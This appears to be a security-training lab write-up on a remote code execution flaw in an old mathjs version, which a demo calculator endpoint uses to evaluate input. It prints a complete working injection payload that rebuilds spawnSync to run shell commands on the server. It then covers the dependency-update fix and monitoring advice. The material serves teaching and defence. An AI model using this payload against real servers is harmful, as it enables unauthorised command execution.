
a9-using-components-with-known-vulnerability.md


Using Components with Known Vulnerabilities

mathjs Remote Code Execution

The version of the mathjs (https://www.npmjs.com/package/mathjs) library used in the application has a remote code execution vulnerability that allows an attacker to run arbitrary code on the server.

To understand how the exploit works, look at this

The calculator implementation uses mathjs.eval to evaluate user input at

http://127.0.0.1:9090/app/calc

There is no input validation either, probably because the input is expected to be a maths expression, which will naturally contain symbols.

Malicious input that triggers command execution:

cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}")();cos.constructor("return spawnSync('id').output[1]")()

Which results in this RCE:

Solution

Change the pinned version in package.json to a compatible version range:

...
    "flash": "^1.1.0",
    "mathjs": "^3.10.1",   // Add ^ to install latest compatible version
    "md5": "^2.2.1",
...

Now reinstall the package by running `npm install`.

Fixes

Implemented in the following files

  • package.json

The fix has been implemented in this commit

Recommendation

  • Dependencies must be updated regularly, and preferably automatically.
  • Solutions like Snyk and NSP (NSP has since been folded into `npm audit`) can regularly monitor your dependencies and alert you to any vulnerable dependencies.

Reference